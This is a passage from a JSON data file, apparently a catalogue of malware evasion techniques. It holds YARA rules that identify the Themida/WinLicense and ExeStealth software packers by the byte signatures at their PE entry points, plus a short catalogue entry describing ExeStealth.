PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 ?? ?? 60 0B C0 74 58 E8 00 00 00 00 58 05 43 00 00 00 80 38 E9 75 03 61 EB 35 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB 19 5A 66 83 C3 34 66 39 18 75 12 0F B7 50 3C 03 D0 BB E9 44 00 00 83 C3 67 39 1A 74 07 2D 00 10 00 00 EB DA 8B F8 B8 ?? ?? ?? 00 03 C7 B9 ?? ?? ?? 00 03 CF EB 0A B8 ?? ?? ?? ?? B9 5A ?? ?? ?? 
50 51 E8 84 00 00 00 E8 00 00 00 00 58 2D 26 00 00 00 B9 EF 01 00 00 C6 00 E9 83 E9 05 89 48 01 61 E9 AF 01 00 00 02 00 00 00 91 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ThemidaWinLicense_V1X_NoCompression_SecureEngine_Oreans_Technologies: PEiD\r\n{\r\n    strings:\r\n        $a = { 8B C5 8B D4 60 E8 00 00 00 00 5D 81 ED ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 0C 8B E8 8B E2 B8 01 00 00 00 C2 0C 00 8B 44 24 24 89 85 ?? ?? ?? ?? 6A 45 E8 A3 00 00 00 68 9A 74 83 07 E8 DF 00 00 00 68 25 4B 89 0A E8 D5 00 00 00 E9 ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ThemidaWinLicense_V10X_V17X_DLL_Oreans_Technologies: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 60 0B C0 74 58 E8 00 00 00 00 58 05 ?? ?? ?? ?? 80 38 E9 75 03 61 EB 35 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB ?? ?? 66 83 ?? ?? 66 39 18 75 12 0F B7 50 3C 03 D0 BB ?? ?? ?? ?? 83 C3 ?? 39 1A 74 07 2D 00 10 00 00 EB DA 8B F8 B8 ?? ?? ?? ?? 03 C7 B9 ?? ?? ?? ?? 03 CF EB 0A B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 50 51 E8 84 00 00 00 E8 00 00 00 00 58 2D ?? ?? ?? ?? B9 ?? ?? ?? ?? C6 00 E9 83 E9 ?? 89 48 01 61 E9 }\r\n        $b = { B8 ?? ?? ?? ?? 60 0B C0 74 58 E8 00 00 00 00 58 05 ?? ?? ?? ?? 80 38 E9 75 03 61 EB 35 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB ?? ?? 66 83 ?? ?? 66 39 18 75 12 0F B7 50 3C 03 D0 BB ?? ?? ?? ?? 83 C3 ?? 
39 1A 74 07 2D 00 10 00 00 EB DA 8B F8 B8 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Themida_Oreans_Technologies_2004: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 00 00 60 0B C0 74 58 E8 00 00 00 00 58 05 43 00 00 00 80 38 E9 75 03 61 EB 35 E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Themida_1201_Oreans_Technologies: PEiD\r\n{\r\n    strings:\r\n        $a = { 8B C5 8B D4 60 E8 00 00 00 00 5D 81 ED ?? ?? 35 09 89 95 ?? ?? 35 09 89 B5 ?? ?? 35 09 89 85 ?? ?? 35 09 83 BD ?? ?? 35 09 00 74 0C 8B E8 8B E2 B8 01 00 00 00 C2 0C 00 8B 44 24 24 89 85 ?? ?? 35 09 6A 45 E8 A3 00 00 00 68 9A 74 83 07 E8 DF 00 00 00 68 25 }\r\n        $b = { 8B C5 8B D4 60 E8 00 00 00 00 5D 81 ED ?? ?? 35 09 89 95 ?? ?? 35 09 89 B5 ?? ?? 35 09 89 85 ?? ?? 35 09 83 BD ?? ?? 35 09 00 74 0C 8B E8 8B E2 B8 01 00 00 00 C2 0C 00 8B 44 24 24 89 85 ?? ?? 35 09 6A 45 E8 A3 00 00 00 68 9A 74 83 07 E8 DF 00 00 00 68 25 4B 89 0A E8 D5 00 00 00 E9 11 02 00 00 00 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Themida_Oreans_Technologies_2004_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 00 00 60 0B C0 74 58 E8 00 00 00 00 58 05 43 00 00 00 80 38 E9 75 03 61 EB 35 E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Themida_10xx_1800_compressed_engine_Oreans_Technologies_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 60 0B C0 74 58 E8 00 00 00 00 58 05 43 00 00 00 80 38 E9 75 03 61 EB 35 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB 19 5A 66 83 C3 34 66 39 18 75 12 0F B7 50 3C 03 D0 BB E9 44 00 00 83 C3 67 39 1A 74 07 2D 00 10 00 00 EB DA 8B F8 B8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Themida_1920_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 8B C5 8B D4 60 E8 00 00 00 00 5D 81 ED ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 
00 74 0C 8B E8 8B E2 B8 01 00 00 00 C2 0C 00 8B 44 24 24 89 85 ?? ?? ?? ?? 6A 45 E8 A3 00 00 00 68 9A 74 83 07 E8 DF 00 00 00 68 25 4B 89 0A E8 D5 00 00 00 E9 14 02 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ThemidaWinLicense_V2100_p_Oreans_Technologies_20090917: PEiD\r\n{\r\n    strings:\r\n        $a = { 83 EC 04 50 53 E8 ?? ?? 00 00 CC 58 8B D8 40 2D ?? ?? ?? ?? 2D ?? ?? ?? ?? 05 ?? ?? ?? ?? 80 3B CC 75 19 C6 03 00 BB 00 10 00 00 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 50 E8 0A 00 00 00 83 C0 00 89 44 24 08 5B 58 C3 55 8B EC 60 8B 75 08 8B 4D 0C C1 E9 02 8B 45 10 8B 5D 14 EB 08 31 06 01 1E 83 C6 04 49 0B C9 75 F4 61 C9 C2 10 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ThemidaWinLicense_V1820_p_Oreans_Technologies_Sign_by_fly: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 00 00 60 0B C0 74 68 E8 00 00 00 00 58 05 ?? 00 00 00 80 38 E9 75 ?? 61 EB ?? DB 2D ?? ?? ?? ?? FF FF FF FF FF FF FF FF 3D 40 E8 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Themida_v2018_c2007_Oreans_Technologies: PEiD\r\n{\r\n    strings:\r\n        $a = { 83 EC 04 50 53 E8 00 00 00 00 58 8B D8 2D 00 ?? ?? 00 2D ?? ?? ?? 00 05 ?? ?? ?? 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule themida_1005_http58wwworeanscom: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 00 00 60 0B C0 74 58 E8 00 00 00 00 58 05 43 00 00 00 80 38 E9 75 03 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ThemidaWinLicense_V1X_NoCompression_SecureEngine_Oreans_Technologies_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 8B C5 8B D4 60 E8 00 00 00 00 5D 81 ED ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 0C 8B E8 8B E2 B8 01 00 00 00 C2 0C 00 8B 44 24 24 89 85 ?? ?? ?? ?? 6A 45 E8 A3 00 00 00 68 9A 74 83 07 E8 DF 00 00 00 68 25 4B 89 0A E8 D5 00 00 00 E9 ?? ?? ?? ?? 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ThemidaWinLicense_V18X_V19Xnbsp_Oreans_Technologiesnbsp_nbsp_SignByfly: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 60 0B C0 74 68 E8 00 00 00 00 58 05 53 00 00 00 80 38 E9 75 13 61 EB 45 DB 2D ?? ?? ?? ?? FF FF FF FF FF FF FF FF 3D ?? ?? ?? ?? 00 00 58 25 00 F0 FF FF 33 FF 66 BB ?? ?? 66 83 ?? ?? 66 39 18 75 12 0F B7 50 3C 03 D0 BB ?? ?? ?? ?? 83 C3 ?? 39 1A 74 07 2D ?? ?? ?? ?? EB DA 8B F8 B8 ?? ?? ?? ?? 03 C7 B9 ?? ?? ?? ?? 03 CF EB 0A B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 50 51 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 58 2D ?? ?? ?? ?? B9 ?? ?? ?? ?? C6 00 E9 83 E9 05 89 48 01 61 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ThemidaWinLicense_V1X_Oreans_Technologies: PEiD\r\n{\r\n    strings:\r\n        $a = { 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 00 43 72 65 61 74 65 }\r\n        $b = { 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 00 43 72 65 61 74 65 46 69 6C 65 41 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 00 43 4F 4D 43 54 4C 33 32 2E 64 6C 6C 00 00 00 49 6E 69 74 43 6F 6D 6D 6F 6E 43 6F 6E 74 72 6F 6C 73 00 00 00 00 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Themida_1201_compressed_Oreans_Technologies: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 ?? ?? 
60 0B C0 74 58 E8 00 00 00 00 58 05 43 00 00 00 80 38 E9 75 03 61 EB 35 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB 19 5A 66 83 C3 34 66 39 18 75 12 0F B7 50 3C 03 D0 BB E9 44 00 00 83 C3 67 39 1A 74 07 2D 00 10 00 00 EB DA 8B F8 B8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ThemidaWinLicense_V18X_V19X_Other_Oreans_Technologies_20080131: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 60 0B C0 74 68 E8 00 00 00 00 58 05 53 00 00 00 80 38 E9 75 13 61 EB 45 DB 2D ?? ?? ?? ?? FF FF FF FF FF FF FF FF 3D ?? ?? ?? ?? 00 00 58 25 00 F0 FF FF 33 FF 66 BB ?? ?? 66 83 ?? ?? 66 39 18 75 12 0F B7 50 3C 03 D0 BB ?? ?? ?? ?? 83 C3 ?? 39 1A 74 07 2D ?? ?? ?? ?? EB DA 8B F8 B8 ?? ?? ?? ?? 03 C7 B9 ?? ?? ?? ?? 03 CF EB 0A B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 50 51 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 58 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Themida_1201_Oreans_Technologies_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 8B C5 8B D4 60 E8 00 00 00 00 5D 81 ED ?? ?? 35 09 89 95 ?? ?? 35 09 89 B5 ?? ?? 35 09 89 85 ?? ?? 35 09 83 BD ?? ?? 35 09 00 74 0C 8B E8 8B E2 B8 01 00 00 00 C2 0C 00 8B 44 24 24 89 85 ?? ?? 35 09 6A 45 E8 A3 00 00 00 68 9A 74 83 07 E8 DF 00 00 00 68 25 4B 89 0A E8 D5 00 00 00 E9 11 02 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Themida_1920: PEiD\r\n{\r\n    strings:\r\n        $a = { 8B C5 8B D4 60 E8 00 00 00 00 5D 81 ED ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 74 0C 8B E8 8B E2 B8 01 00 00 00 C2 0C 00 8B 44 24 24 89 85 ?? ?? ?? ?? 6A 45 E8 A3 00 00 00 68 9A 74 83 07 E8 DF 00 00 00 68 25 4B 89 0A E8 D5 00 00 00 E9 14 02 00 00 }\r\n        $b = { BE ?? ?? BF ?? ?? B9 ?? ?? 56 FC F3 A5 5F E9 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Themida_18xx_19xx_Oreans_Technologies: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 
60 0B C0 74 68 E8 00 00 00 00 58 05 53 00 00 00 80 38 E9 75 13 61 EB 45 DB 2D 37 ?? ?? ?? FF FF FF FF FF FF FF FF 3D 40 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB 19 5A 66 83 C3 34 66 39 18 75 12 0F B7 50 3C 03 D0 BB E9 44 00 00 83 C3 67 39 1A 74 07 2D 00 10 00 00 EB DA 8B F8 B8 ?? ?? ?? ?? 03 C7 B9 ?? ?? ?? ?? 03 CF EB 0A B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 50 51 E8 84 00 00 00 E8 00 00 00 00 58 2D 26 00 00 00 B9 EF 01 00 00 C6 00 E9 83 E9 05 89 48 01 61 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ThemidaWinLicense_V1X_V2X_Oreans_Technologies: PEiD\r\n{\r\n    strings:\r\n        $a = { 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 00 43 72 65 61 74 65 46 69 6C 65 41 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 00 43 4F 4D 43 54 4C 33 32 2E 64 6C 6C 00 00 00 49 6E 69 74 43 6F 6D 6D 6F 6E 43 6F 6E 74 72 6F 6C 73 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Themida_10xx_18xx_no_compression_Oreans_Technologies: PEiD\r\n{\r\n    strings:\r\n        $a = { 55 8B EC 83 C4 D8 60 E8 00 00 00 00 5A 81 EA ?? ?? ?? ?? 8B DA C7 45 D8 00 00 00 00 8B 45 D8 40 89 45 D8 81 7D D8 80 00 00 00 74 0F 8B 45 08 89 83 ?? ?? ?? ?? FF 45 08 43 EB E1 89 45 DC 61 8B 45 DC C9 C2 04 00 55 8B EC 81 C4 7C FF FF FF 60 E8 00 00 00 00 }\r\n        $b = { 55 8B EC 83 C4 D8 60 E8 00 00 00 00 5A 81 EA ?? ?? ?? ?? 8B DA C7 45 D8 00 00 00 00 8B 45 D8 40 89 45 D8 81 7D D8 80 00 00 00 74 0F 8B 45 08 89 83 ?? ?? ?? ?? FF 45 08 43 EB E1 89 45 DC 61 8B 45 DC C9 C2 04 00 55 8B EC 81 C4 7C FF FF FF 60 E8 00 00 00 00 5A 81 EA ?? ?? ?? ?? 8D 45 80 8B 5D 08 C7 85 7C FF FF FF 00 00 00 00 8B 8D 7C FF FF FF D1 C3 88 18 41 89 8D 7C FF FF FF 81 BD 7C FF FF FF 80 00 00 00 75 E3 C7 85 7C FF FF FF 00 00 00 00 8D BA ?? ?? ?? ?? 
8D 75 80 8A 0E BB F4 01 00 00 B8 AB 37 54 78 D3 D0 8A 0F D3 D0 4B 75 F7 0F AF C3 47 46 8B 8D 7C FF FF FF 41 89 8D 7C FF FF FF 81 F9 80 00 00 00 75 D1 61 C9 C2 04 00 55 8B EC 83 C4 F0 8B 75 08 C7 45 FC 00 00 00 00 EB 04 FF 45 FC 46 80 3E 00 75 F7 BA 00 00 00 00 8B 75 08 8B 7D 0C EB 7F C7 45 F8 00 00 00 00 EB }\r\n        $c = { 55 8B EC 83 C4 D8 60 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Themida_10xx_1800_compressed_engine_Oreans_Technologies: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 60 0B C0 74 58 E8 00 00 00 00 58 05 43 00 00 00 80 38 E9 75 03 61 EB 35 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB 19 5A 66 83 C3 34 66 39 18 75 12 0F B7 50 3C 03 D0 BB E9 44 00 00 83 C3 67 39 1A 74 07 2D 00 10 00 00 EB DA 8B F8 B8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule themida_1005_httpwwworeanscom: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 00 00 60 0B C0 74 58 E8 00 00 00 00 58 05 43 00 00 00 80 38 E9 75 03 61 EB 35 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB 19 5A 66 83 C3 34 66 39 18 75 12 0F B7 50 3C 03 D0 BB E9 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ThemidaWinLicense_V1000_V1800_Oreans_Technologies: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 00 00 60 0B C0 74 58 E8 00 00 00 00 58 05 ?? 00 00 00 80 38 E9 75 ?? 61 EB ?? E8 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ThemidaWinLicense_V1802_p_Oreans_Technologies: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 00 00 60 0B C0 74 68 E8 00 00 00 00 58 05 ?? 00 00 00 80 38 E9 75 ?? 61 EB ?? DB 2D ?? ?? ?? ?? FF FF FF FF FF FF FF FF 3D 40 E8 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Themida_18xx_Oreans_Technologies_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 60 0B C0 74 68 E8 00 00 00 00 58 05 53 00 00 00 80 38 E9 75 13 61 EB 45 DB 2D 37 ?? ?? ?? 
FF FF FF FF FF FF FF FF 3D 40 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB 19 5A 66 83 C3 34 66 39 18 75 12 0F B7 50 3C 03 D0 BB E9 44 00 00 83 C3 67 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Themida_10xx_18xx_no_compression_Oreans_Technologies_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 55 8B EC 83 C4 D8 60 E8 00 00 00 00 5A 81 EA ?? ?? ?? ?? 8B DA C7 45 D8 00 00 00 00 8B 45 D8 40 89 45 D8 81 7D D8 80 00 00 00 74 0F 8B 45 08 89 83 ?? ?? ?? ?? FF 45 08 43 EB E1 89 45 DC 61 8B 45 DC C9 C2 04 00 55 8B EC 81 C4 7C FF FF FF 60 E8 00 00 00 00 5A 81 EA ?? ?? ?? ?? 8D 45 80 8B 5D 08 C7 85 7C FF FF FF 00 00 00 00 8B 8D 7C FF FF FF D1 C3 88 18 41 89 8D 7C FF FF FF 81 BD 7C FF FF FF 80 00 00 00 75 E3 C7 85 7C FF FF FF 00 00 00 00 8D BA ?? ?? ?? ?? 8D 75 80 8A 0E BB F4 01 00 00 B8 AB 37 54 78 D3 D0 8A 0F D3 D0 4B 75 F7 0F AF C3 47 46 8B 8D 7C FF FF FF 41 89 8D 7C FF FF FF 81 F9 80 00 00 00 75 D1 61 C9 C2 04 00 55 8B EC 83 C4 F0 8B 75 08 C7 45 FC 00 00 00 00 EB 04 FF 45 FC 46 80 3E 00 75 F7 BA 00 00 00 00 8B 75 08 8B 7D 0C EB 7F C7 45 F8 00 00 00 00 EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ThemidaWinLicense_V18X_V19X_Other_Oreans_Technologies_SignByfly_20080131: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 60 0B C0 74 68 E8 00 00 00 00 58 05 53 00 00 00 80 38 E9 75 13 61 EB 45 DB 2D ?? ?? ?? ?? FF FF FF FF FF FF FF FF 3D ?? ?? ?? ?? 00 00 58 25 00 F0 FF FF 33 FF 66 BB ?? ?? 66 83 ?? ?? 66 39 18 75 12 0F B7 50 3C 03 D0 BB ?? ?? ?? ?? 83 C3 ?? 39 1A 74 07 2D ?? ?? ?? ?? EB DA 8B F8 B8 ?? ?? ?? ?? 03 C7 B9 ?? ?? ?? ?? 03 CF EB 0A B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 50 51 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 58 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ThemidaWinLicense_V1802_p_Oreans_Technologies_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 00 00 60 0B C0 74 68 E8 00 00 00 00 58 05 ?? 00 00 00 80 38 E9 75 ?? 61 EB ?? DB 2D ?? ?? ?? ?? 
FF FF FF FF FF FF FF FF 3D 40 E8 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ThemidaWinLicense_V18X_V2X_Oreans_Technologies_20080131: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 60 0B C0 74 68 E8 00 00 00 00 58 05 53 00 00 00 80 38 E9 75 13 61 EB 45 DB 2D ?? ?? ?? ?? FF FF FF FF FF FF FF FF 3D ?? ?? ?? ?? 00 00 58 25 00 F0 FF FF 33 FF 66 BB ?? ?? 66 83 ?? ?? 66 39 18 75 12 0F B7 50 3C 03 D0 BB ?? ?? ?? ?? 83 C3 ?? 39 1A 74 07 2D ?? ?? ?? ?? EB DA 8B F8 B8 ?? ?? ?? ?? 03 C7 B9 ?? ?? ?? ?? 03 CF EB 0A B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 50 51 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 58 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Themida_v2065_or_newer_c2009_Oreans_Technologies: PEiD\r\n{\r\n    strings:\r\n        $a = { 52 BA 64 00 00 00 EB 1B B9 00 10 00 00 EB 05 03 C1 03 C3 49 0B C9 75 F7 52 54 54 FF 15 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Themida_v2010_v2065_or_newer: PEiD\r\n{\r\n    strings:\r\n        $a = { 83 EC 04 50 53 E8 ?? 00 00 00 CC 58 8B D8 40 2D 00 ?? ?? 00 2D ?? ?? ?? 00 05 ?? ?? ?? 00 80 3B CC 75 19 C6 03 00 BB 00 10 00 00 68 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Themida_1201_Oreans_Technologies_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 8B C5 8B D4 60 E8 00 00 00 00 5D 81 ED ?? ?? 35 09 89 95 ?? ?? 35 09 89 B5 ?? ?? 35 09 89 85 ?? ?? 35 09 83 BD ?? ?? 35 09 00 74 0C 8B E8 8B E2 B8 01 00 00 00 C2 0C 00 8B 44 24 24 89 85 ?? ?? 35 09 6A 45 E8 A3 00 00 00 68 9A 74 83 07 E8 DF 00 00 00 68 25 }\r\n        $b = { 8B C5 8B D4 60 E8 00 00 00 00 5D 81 ED ?? ?? 35 09 89 95 ?? ?? 35 09 89 B5 ?? ?? 35 09 89 85 ?? ?? 35 09 83 BD ?? ?? 35 09 00 74 0C 8B E8 8B E2 B8 01 00 00 00 C2 0C 00 8B 44 24 24 89 85 ?? ?? 
35 09 6A 45 E8 A3 00 00 00 68 9A 74 83 07 E8 DF 00 00 00 68 25 4B 89 0A E8 D5 00 00 00 E9 11 02 00 00 00 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ThemidaWinLicense_V1000_V1800_Oreans_Technologies_Sign_by_fly: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 00 00 60 0B C0 74 58 E8 00 00 00 00 58 05 ?? 00 00 00 80 38 E9 75 ?? 61 EB ?? E8 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}"
                }
            ]
        },
        {
            "id": 186,
            "unprotect_id": "U1405",
            "name": "ExeStealth",
            "categories": [
                {
                    "id": 12,
                    "key": "packers",
                    "label": "Packers"
                }
            ],
            "description": "ExeStealth is a tool that encrypts executable files to protect them from detection and tampering. Designed by WebToolMaster, this free software is simple to use and is one of the best anti-hacking tools on the market, which also makes it effective at hiding malware code on a system.",
            "resources": "https://www.webtoolmaster.com/exestealth.htm",
            "tags": "ExeStealth",
            "snippets": [],
            "detection_rules": [
                {
                    "id": 104,
                    "key": "yara_detect_exestealth",
                    "type": {
                        "id": 1,
                        "name": "YARA",
                        "syntax_lang": "YARA"
                    },
                    "name": "YARA_Detect_Exestealth",
                    "rule": "rule ExeStealth_WebToolMaster: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 58 53 68 61 72 65 77 61 72 65 2D 56 65 72 73 69 6F 6E 20 45 78 65 53 74 65 61 6C 74 68 2C 20 63 6F 6E 74 61 63 74 20 73 75 70 70 6F 72 74 40 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 2E 63 6F }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule EXEStealth_v275a_WebtoolMaster_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 58 53 68 61 72 65 77 61 72 65 2D 56 65 72 73 69 6F 6E 20 45 78 65 53 74 65 61 6C 74 68 2C 20 63 6F 6E 74 61 63 74 20 73 75 70 70 6F 72 74 40 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 2E 63 6F 6D 20 2D 20 77 77 77 2E 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 2E 63 6F 6D 00 90 60 90 E8 00 00 00 00 5D 81 ED F7 27 40 00 B9 15 00 00 00 83 C1 04 83 C1 01 EB 05 EB FE 83 C7 56 EB 00 EB 00 83 E9 02 81 C1 78 43 27 65 EB 00 81 C1 10 25 94 00 81 E9 63 85 00 00 B9 96 0C 00 00 90 8D BD 74 28 40 00 8B F7 AC ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? AA E2 C5 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule EXEStealth_275_WebtoolMaster_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 33 C9 B4 4E CD 21 73 02 FF ?? BA ?? 00 B8 ?? 3D CD 21 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule EXEStealth_276_Unregistered_WebtoolMaster_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB ?? 45 78 65 53 74 65 61 6C 74 68 20 56 32 20 53 68 61 72 65 77 61 72 65 20 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule EXEStealth_276_Unregistered_WebtoolMaster: PEiD\r\n{\r\n    strings:\r\n        $a = { EB ?? 
45 78 65 53 74 65 61 6C 74 68 20 56 32 20 53 68 61 72 65 77 61 72 65 20 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule EXEStealth_275_WebtoolMaster: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 90 E8 00 00 00 00 5D 81 ED D1 27 40 00 B9 15 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule EXEStealth_v275a_WebtoolMaster: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 58 53 68 61 72 65 77 61 72 65 2D 56 65 72 73 69 6F 6E 20 45 78 65 53 74 65 61 6C 74 68 2C 20 63 6F 6E 74 61 63 74 20 73 75 70 70 6F 72 74 40 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 2E 63 6F 6D 20 2D 20 77 77 77 2E 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 2E 63 6F 6D 00 90 60 90 E8 00 00 00 00 5D 81 ED F7 27 40 00 B9 15 00 00 00 83 C1 04 83 C1 01 EB 05 EB FE 83 C7 56 EB 00 EB 00 83 E9 02 81 C1 78 43 27 65 EB 00 